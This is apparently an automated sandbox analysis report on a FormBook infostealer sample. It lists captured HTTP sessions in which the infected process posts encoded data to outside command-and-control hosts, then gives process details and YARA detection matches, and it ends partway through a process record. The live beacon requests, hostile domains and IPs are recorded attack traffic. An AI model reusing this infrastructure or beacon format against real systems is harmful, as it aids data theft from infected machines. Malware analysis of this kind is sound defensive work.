                                                            13192.168.2.44973647.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:17.125931978 CEST721OUTPOST /iwsk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.qzsazi.info
                                                            Origin: http://www.qzsazi.info
                                                            Referer: http://www.qzsazi.info/iwsk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 6e 79 44 46 61 41 4a 6c 6e 76 2f 35 2b 47 70 73 6f 4b 78 36 53 51 38 49 66 2b 53 53 41 7a 33 6b 77 6a 76 33 78 49 30 6d 43 74 35 4a 67 6c 57 6b 46 73 2b 64 52 33 76 56 66 59 56 77 4e 2f 76 44 6d 45 64 4d 49 63 77 51 4d 5a 51 35 30 4c 4a 4b 65 43 6f 6f 39 33 65 50 63 31 42 2f 58 43 48 4b 37 30 66 35 62 39 4e 67 5a 6e 70 69 6b 57 43 48 37 4f 32 45 63 70 66 56 30 4d 2b 72 70 4e 4c 78 68 4f 63 56 58 4d 42 7a 31 6e 44 5a 37 30 34 33 74 37 61 2f 6e 63 6f 45 75 32 55 4e 48 4e 77 53 69 4c 36 65 2b 73 32 6d 43 61 34 47 35 4e 35 75 34 53 68 6a 45 31 34 33 74 31 6b 67 45 2b 32 46 42 67 3d 3d
                                                            Data Ascii: u8S0Yd=nyDFaAJlnv/5+GpsoKx6SQ8If+SSAz3kwjv3xI0mCt5JglWkFs+dR3vVfYVwN/vDmEdMIcwQMZQ50LJKeCoo93ePc1B/XCHK70f5b9NgZnpikWCH7O2EcpfV0M+rpNLxhOcVXMBz1nDZ7043t7a/ncoEu2UNHNwSiL6e+s2mCa4G5N5u4ShjE143t1kgE+2FBg==
                                                            Apr 1, 2025 09:05:18.088798046 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:17 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.44973747.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:19.959129095 CEST741OUTPOST /iwsk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.qzsazi.info
                                                            Origin: http://www.qzsazi.info
                                                            Referer: http://www.qzsazi.info/iwsk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 6e 79 44 46 61 41 4a 6c 6e 76 2f 35 38 6e 35 73 76 72 78 36 5a 51 38 48 44 75 53 53 50 54 33 6f 77 6a 6a 33 78 4a 78 39 43 2f 64 4a 6a 48 2b 6b 44 5a 43 64 53 33 76 56 58 34 56 31 53 50 76 55 6d 45 52 69 49 64 63 51 4d 59 77 35 30 50 46 4b 65 7a 6f 72 38 6e 65 4a 61 31 42 78 61 69 48 4b 37 30 66 35 62 39 49 31 5a 6e 78 69 6b 6d 79 48 35 72 61 46 56 4a 66 55 31 4d 2b 72 74 4e 4b 34 68 4f 64 77 58 4a 70 5a 31 6b 37 5a 37 31 49 33 74 71 61 34 74 63 70 50 74 47 55 59 44 59 46 4c 6b 70 2f 33 32 2f 61 57 49 70 35 6a 31 72 30 30 70 6a 41 30 57 31 63 45 77 79 74 55 4a 39 4c 4d 61 67 50 5a 63 6e 4d 6a 4a 41 55 4b 61 41 68 6a 2b 62 58 59 57 47 59 3d
                                                            Data Ascii: u8S0Yd=nyDFaAJlnv/58n5svrx6ZQ8HDuSSPT3owjj3xJx9C/dJjH+kDZCdS3vVX4V1SPvUmERiIdcQMYw50PFKezor8neJa1BxaiHK70f5b9I1ZnxikmyH5raFVJfU1M+rtNK4hOdwXJpZ1k7Z71I3tqa4tcpPtGUYDYFLkp/32/aWIp5j1r00pjA0W1cEwytUJ9LMagPZcnMjJAUKaAhj+bXYWGY=
                                                            Apr 1, 2025 09:05:20.805785894 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:20 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.44973847.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:22.833292961 CEST6998OUTPOST /iwsk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.qzsazi.info
                                                            Origin: http://www.qzsazi.info
                                                            Referer: http://www.qzsazi.info/iwsk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 6e 79 44 46 61 41 4a 6c 6e 76 2f 35 38 6e 35 73 76 72 78 36 5a 51 38 48 44 75 53 53 50 54 33 6f 77 6a 6a 33 78 4a 78 39 43 2f 56 4a 67 30 47 6b 46 4b 71 64 54 33 76 56 5a 59 56 30 53 50 76 4a 6d 45 5a 6d 49 64 41 41 4d 50 67 35 31 63 74 4b 5a 51 41 72 30 33 65 4a 53 56 42 39 65 69 48 41 37 79 2f 39 62 39 4d 31 5a 6b 31 69 6b 6d 79 48 34 2b 32 46 63 35 66 57 31 4d 2b 44 6b 74 4c 78 68 4f 63 56 58 49 74 4a 31 56 62 5a 36 56 59 33 69 34 79 34 75 38 70 4e 6f 47 56 64 44 59 42 4b 6b 6f 58 46 32 36 2b 67 49 62 68 6a 6d 4d 74 62 36 53 63 41 4e 6b 6b 63 73 78 78 73 43 37 4c 42 56 51 4c 77 63 43 59 6f 52 52 68 69 66 58 78 7a 37 49 50 6a 50 7a 34 37 47 6a 72 68 75 33 69 65 4c 54 71 45 62 52 52 51 4a 65 75 68 7a 62 62 31 59 77 68 46 2b 34 58 44 36 57 30 47 49 62 64 48 6e 44 76 55 46 76 6c 77 50 44 4a 64 36 49 58 4b 53 45 78 4e 7a 66 4b 53 44 69 5a 4a 45 39 44 54 50 4e 54 72 31 56 2f 46 2b 38 43 73 42 55 41 72 41 75 43 44 2b 43 2f 58 69 54 63 49 35 42 34 65 75 6d 62 50 6c 33 53 45 78 2f 4c [TRUNCATED]
                                                            Data Ascii: u8S0Yd=nyDFaAJlnv/58n5svrx6ZQ8HDuSSPT3owjj3xJx9C/VJg0GkFKqdT3vVZYV0SPvJmEZmIdAAMPg51ctKZQAr03eJSVB9eiHA7y/9b9M1Zk1ikmyH4+2Fc5fW1M+DktLxhOcVXItJ1VbZ6VY3i4y4u8pNoGVdDYBKkoXF26+gIbhjmMtb6ScANkkcsxxsC7LBVQLwcCYoRRhifXxz7IPjPz47Gjrhu3ieLTqEbRRQJeuhzbb1YwhF+4XD6W0GIbdHnDvUFvlwPDJd6IXKSExNzfKSDiZJE9DTPNTr1V/F+8CsBUArAuCD+C/XiTcI5B4eumbPl3SEx/LnIvqrSLTS3LK4/+lvrMyORva3QqYlBCs6IxnCIALKyvg5DeL1LLNHamU2qMiw+s15O0+eO2XTmiAjL0FOax9TlJCyXzNjsJwfUzYsgZxIMFaH2XEfzcF7fTJfaqYE/xfJoEMLOGacpBHxQMqYrALZiEc2vsYbvWA38jNp3Wd1jG88OLXW5PHuyjugoN4NGE6TWfDH5xRFGLeffMIeo9CmBeswfOE3MuZYsG5u4o7kF3Kp3EL3rg3je5a5mDnmWTMBw2NDKfe+Lz7F2U3Kh5Fm6RbK0t7f98Eijqh4glprQdPwQ96I6otY/+bula5wE6vyWDtk60fPj1XVXCKVDOFu5Qv2V0Vm0RwjR57bTqQaKl2pot0wAlWv+b3KkVUaCsgRdHNJwAd0LsWxfVzpNvJZO9TvuJ58HQyAONrQAXAhjgpbKAs2TaciOvZAela62eboNJDKWfoOcTGU/VUF12YGVA4Cgbm7+1q0grPbX1Ak9+sYKGt+O3NoVnuPtYygvgHIK1NmT36T4zhliWZYSkg/MJ3vHUmULJkRxO0Hqmt4IsLjWInQHEroQY4lOwqZrgn6q6tkr4XG9ZZ+qOWhUTWG+RL45BtMIGg3+7AQthPiJcusB7ga+GN79aq0K/sg+wQdI0+647W7j+Bycf5/o2NXcXdSL0LZVT8GT [TRUNCATED]
                                                            Apr 1, 2025 09:05:23.797908068 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:23 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.44973947.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:25.659905910 CEST458OUTGET /iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.qzsazi.info
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:05:26.658189058 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:26 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.449740162.218.30.235806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:32.116102934 CEST718OUTPOST /gwiz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.l33900.xyz
                                                            Origin: http://www.l33900.xyz
                                                            Referer: http://www.l33900.xyz/gwiz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 7a 50 69 45 66 31 74 56 79 34 48 63 73 33 50 57 34 63 4e 2f 58 58 50 34 57 75 70 38 4a 51 77 6a 2f 4a 6c 77 69 49 53 4d 62 4d 46 6b 71 37 74 6b 47 69 57 4a 59 61 74 44 4f 77 5a 73 37 6c 4e 79 34 64 35 37 6f 74 49 52 6e 6a 36 78 42 78 69 31 6e 53 53 6c 4b 67 59 4f 5a 33 59 65 46 55 32 2b 49 64 75 63 4e 39 6a 6b 4e 4b 63 44 64 34 52 30 65 4a 33 48 42 57 52 2f 2f 58 31 79 69 2b 4b 57 78 4a 34 55 65 64 46 4f 6b 6f 65 6b 4a 4d 4f 38 6d 4c 38 5a 54 2b 64 5a 48 4f 67 72 45 2f 42 45 56 4d 69 71 65 69 49 75 67 35 53 4f 44 6c 63 70 2b 55 42 77 54 49 6d 39 6b 41 4f 74 38 33 34 66 2f 51 3d 3d
                                                            Data Ascii: u8S0Yd=zPiEf1tVy4Hcs3PW4cN/XXP4Wup8JQwj/JlwiISMbMFkq7tkGiWJYatDOwZs7lNy4d57otIRnj6xBxi1nSSlKgYOZ3YeFU2+IducN9jkNKcDd4R0eJ3HBWR//X1yi+KWxJ4UedFOkoekJMO8mL8ZT+dZHOgrE/BEVMiqeiIug5SODlcp+UBwTIm9kAOt834f/Q==
                                                            Apr 1, 2025 09:05:32.283509970 CEST455INHTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Tue, 01 Apr 2025 07:05:32 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/"></a></body>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.449741162.218.30.235806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:34.821824074 CEST738OUTPOST /gwiz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.l33900.xyz
                                                            Origin: http://www.l33900.xyz
                                                            Referer: http://www.l33900.xyz/gwiz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 7a 50 69 45 66 31 74 56 79 34 48 63 75 57 66 57 72 74 4e 2f 62 6e 50 37 54 75 70 38 48 77 78 6b 2f 4a 70 77 69 4a 48 4c 62 65 68 6b 72 65 70 6b 55 52 4f 4a 62 61 74 44 47 51 5a 70 6b 31 4e 50 34 64 30 47 6f 73 30 52 6e 6a 75 78 42 77 53 31 6e 68 71 6b 4c 77 59 4d 55 58 59 63 62 6b 32 2b 49 64 75 63 4e 39 32 50 4e 4b 45 44 63 4c 4a 30 59 73 4c 41 66 6d 52 38 34 58 31 79 6d 2b 4b 4b 78 4a 34 71 65 63 59 5a 6b 75 53 6b 4a 4d 2b 38 6d 5a 59 61 47 75 64 66 44 4f 68 72 45 4e 6f 57 56 2b 58 53 5a 67 45 53 67 35 47 45 43 6a 52 7a 76 6c 67 6e 42 49 43 4f 35 48 48 5a 78 30 46 57 6b 62 55 75 66 33 72 37 59 74 35 43 6e 35 50 76 63 37 37 31 6c 51 59 3d
                                                            Data Ascii: u8S0Yd=zPiEf1tVy4HcuWfWrtN/bnP7Tup8Hwxk/JpwiJHLbehkrepkUROJbatDGQZpk1NP4d0Gos0RnjuxBwS1nhqkLwYMUXYcbk2+IducN92PNKEDcLJ0YsLAfmR84X1ym+KKxJ4qecYZkuSkJM+8mZYaGudfDOhrENoWV+XSZgESg5GECjRzvlgnBICO5HHZx0FWkbUuf3r7Yt5Cn5Pvc771lQY=
                                                            Apr 1, 2025 09:05:34.999754906 CEST455INHTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Tue, 01 Apr 2025 07:05:34 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/"></a></body>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.449742162.218.30.235806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:37.527936935 CEST6995OUTPOST /gwiz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.l33900.xyz
                                                            Origin: http://www.l33900.xyz
                                                            Referer: http://www.l33900.xyz/gwiz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 7a 50 69 45 66 31 74 56 79 34 48 63 75 57 66 57 72 74 4e 2f 62 6e 50 37 54 75 70 38 48 77 78 6b 2f 4a 70 77 69 4a 48 4c 62 65 70 6b 71 6f 56 6b 47 41 4f 4a 61 61 74 44 4d 77 5a 6f 6b 31 4e 6f 34 64 73 4b 6f 73 34 6e 6b 55 57 78 41 6d 4f 31 67 44 53 6b 42 67 59 4d 45 6e 59 59 51 45 32 34 49 64 2b 59 4e 39 69 50 4e 4a 41 44 63 4c 4a 30 5a 35 33 41 45 57 52 2b 34 58 31 6b 76 65 4b 57 78 4a 34 55 65 65 31 65 6b 2b 79 6b 4a 6f 61 38 6b 71 38 61 62 65 64 64 50 75 68 46 45 4e 30 4c 56 2b 66 47 5a 6b 67 43 67 4a 6d 45 42 55 34 38 34 58 30 54 53 35 4c 53 73 6b 6a 6e 71 46 52 61 6c 62 6b 76 59 43 7a 31 4e 34 5a 55 74 2b 36 46 41 36 7a 43 39 32 58 66 6a 44 68 77 55 6e 6a 46 37 75 33 55 54 61 5a 59 63 72 6a 6f 43 34 33 56 71 55 67 39 2b 36 79 54 46 35 66 53 4c 64 35 74 50 50 47 51 58 64 48 4f 36 2f 61 69 53 4c 35 41 73 2f 69 67 6f 33 39 38 32 45 41 67 38 43 68 56 79 33 53 51 7a 6b 6d 44 73 77 73 65 77 42 63 78 54 42 6e 5a 52 47 6a 48 49 64 45 4e 2b 30 63 53 54 4e 46 6e 2b 72 38 71 36 46 43 [TRUNCATED]
                                                            Data Ascii: u8S0Yd=zPiEf1tVy4HcuWfWrtN/bnP7Tup8Hwxk/JpwiJHLbepkqoVkGAOJaatDMwZok1No4dsKos4nkUWxAmO1gDSkBgYMEnYYQE24Id+YN9iPNJADcLJ0Z53AEWR+4X1kveKWxJ4Uee1ek+ykJoa8kq8abeddPuhFEN0LV+fGZkgCgJmEBU484X0TS5LSskjnqFRalbkvYCz1N4ZUt+6FA6zC92XfjDhwUnjF7u3UTaZYcrjoC43VqUg9+6yTF5fSLd5tPPGQXdHO6/aiSL5As/igo3982EAg8ChVy3SQzkmDswsewBcxTBnZRGjHIdEN+0cSTNFn+r8q6FCdREs06MhYEjmBToUpkeh3UMqtNWs1xGN6eGbIqjRbA5chtwsSKD3sqHciHpmC0gbv+UDNx1QYd+82Nsfn6yvoVAD35o27dWJzU9Oe0Gd+kFYWyvr+9BalDVXboyXGpPIS0zk7BW4skY8hbHg046uy7ZZLcsERhV/klEqM/GBmeQKlEN8AGaen8TSHSNIpVDxyDHuvdNDifFb7YJNOiiirOR/mRzpHvlr52Zf4tv0pQqqZ/8fTge7oPTDNn6d1+dMMbwO2dVo5HcXNza+AemOE4dgMfgyqOJQ7SdBVhFkARSqgqBg5dsl80w5+bk8mfMU2rorjzBxqQoAiofFN82XoTK2ANM91wvFsX5esSng9ecnzK/ML7lDTRNxhL0VXcYEFNcJvPJiJ8deXNMTMfgKNH0RYCZ9MksWEF2qWdQuZV88K8YJ2Kq/s1tFSH29/LNW+dev0U6BJ8TlY3QB7Q+Gsl7T9aeoWP3a+tlqp3l1VPe+ek68tlLfxAWgyJJgxCf4nX+Xqw6q06FXsCEuYi98w3FJuLYSwoLnVcSAfaHXwDnEW8egZ/R+BoZ04VXvkeqnhONOzgZRZCnahfuPQJbFmHTiUUeWfhW5H5/M+ZN9V74TdZUIbLYydODWqVUHa54SWuHT2dEmnT21UU0EqaNAayNY0I0zS051vR [TRUNCATED]
                                                            Apr 1, 2025 09:05:37.692320108 CEST455INHTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Tue, 01 Apr 2025 07:05:36 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/"></a></body>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.449743162.218.30.235806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:40.252130985 CEST457OUTGET /gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.l33900.xyz
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:05:40.421483994 CEST455INHTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Tue, 01 Apr 2025 07:05:40 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=96442/gwiz/"></a></body>


                                                            Click to jump to process

                                                            Click to jump to process

                                                            • File
                                                            • Registry

                                                            Click to dive into process behavior distribution

                                                            Target ID:1
                                                            Start time:03:02:29
                                                            Start date:01/04/2025
                                                            Path:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\eoIIBcxUj3.exe"
                                                            Imagebase:0x500000
                                                            File size:1'182'208 bytes
                                                            MD5 hash:C2C8B9851E807452F57CD7A1FABEC3BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:03:02:31
                                                            Start date:01/04/2025
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\eoIIBcxUj3.exe"
                                                            Imagebase:0xcf0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:03:02:56
                                                            Start date:01/04/2025
